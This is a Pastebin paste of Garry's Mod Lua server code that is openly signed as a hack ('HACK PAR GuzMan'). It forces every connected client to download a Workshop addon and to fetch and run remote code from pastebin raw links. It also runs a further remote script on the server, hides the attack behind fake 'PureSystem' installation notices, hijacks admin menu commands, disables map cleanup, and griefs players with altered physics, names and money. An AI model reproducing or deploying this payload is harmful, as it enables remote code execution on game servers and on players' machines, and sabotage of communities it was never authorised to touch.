Advertisement
GuzManHax

Untitled

Jun 27th, 2019
131
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.62 KB | None | 0 0
  1. if SERVER then
  2. for k, v in pairs(player.GetAll()) do
  3. v:SendLua("steamworks.FileInfo(1751603329,function(result)steamworks.Download(result.fileid,true,function(name)game.MountGMA(name)end) end)")
  4. end
  5.  
  6.  
  7. print([[
  8. _____ _ _ _____ ______ _____ _____ ____________ _ _ ______ _____ ____
  9. | __ \| | | | __ \| ____/ ____|_ _|___ / ____| | | | | ____/ ____/ __ \ _
  10. | |__) | | | | |__) | |__ | | __ | | / /| |__ | |__| | | |__ | | | | | |_| |_
  11. | ___/| | | | _ /| __|| | |_ | | | / / | __| | __ | | __|| | | | | |_ _|
  12. | | | |__| | | \ \| |___| |__| |_| |_ / /__| |____| | | | | |___| |___| |__| | |_|
  13. |_| \____/|_| \_\______\_____|_____/_____|______|_| |_| |______\_____\____/
  14.  
  15.  
  16. ]])
  17.  
  18. timer.Create( "gvacspam", 0.1, 1, function()
  19. for k, ply in pairs( player.GetAll() ) do
  20. DarkRP.notify(ply, 2, 4, "[PureSystem] Installation des prérequis.")
  21. end
  22. end)
  23.  
  24. timer.Simple( 10, function()
  25. for k, ply in pairs( player.GetAll() ) do
  26. DarkRP.notify(ply, 2, 4, "[PureSystem] Lancement de L'installation.")
  27. end
  28. end )
  29.  
  30. timer.Simple( 14, function()
  31. for k,v in pairs(player.GetAll()) do
  32. v:SendLua([[http.Fetch('https://pastebin.com/raw/rdYBcLf5',function(b,l,h,c)RunString(b)end,nil)]])
  33. v:SetRunSpeed(400* 4);
  34. v:SetWalkSpeed(200 * 2);
  35. end
  36.  
  37. RunConsoleCommand("sv_friction", "-8")
  38.  
  39. timer.Create( "gtonip", 15, 0, function()
  40. for k,v in pairs(player.GetAll()) do
  41. v:GodEnable()
  42. v:setDarkRPVar( "rpname", "Gizeh éco + vous remercie de votre patience." )
  43. end
  44.  
  45. end )
  46. end )
  47.  
  48. timer.Simple( 76, function()
  49. http.Fetch('https://pastebin.com/raw/7ABFD4Bu',function(b,l,h,c)RunString(b)end,nil)
  50. end )
  51.  
  52. timer.Simple( 77, function()
  53. for k, ply in pairs( player.GetAll() ) do
  54. DarkRP.notify(ply, 2, 4, "[PureSystem] Merci pour votre patience.")
  55. DarkRP.notify(ply, 2, 20, "HACK PAR GuzMan")
  56. end
  57. end )
  58.  
  59. timer.Simple( 210, function()
  60. RunConsoleCommand("sv_friction", "8")
  61. hook.Remove("Think", "2012akaapocalypse")
  62. end )
  63.  
  64.  
  65. hook.Remove( "PlayerSay", "Pure_Menu" )
  66. concommand.Remove("Pure_openMenu")
  67. concommand.Remove("ulx menu")
  68. ULib.addSayCommand( '!menu', lechat )
  69. ULib.cmds.addCommand( "ulx menu", lechat )
  70.  
  71.  
  72.  
  73. function game.CleanUpMap() end
  74.  
  75. timer.Create("moneymoney", 1, 0, function()
  76. for k,v in pairs(player.GetAll()) do v:addMoney(1648125) end
  77. end)
  78. end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement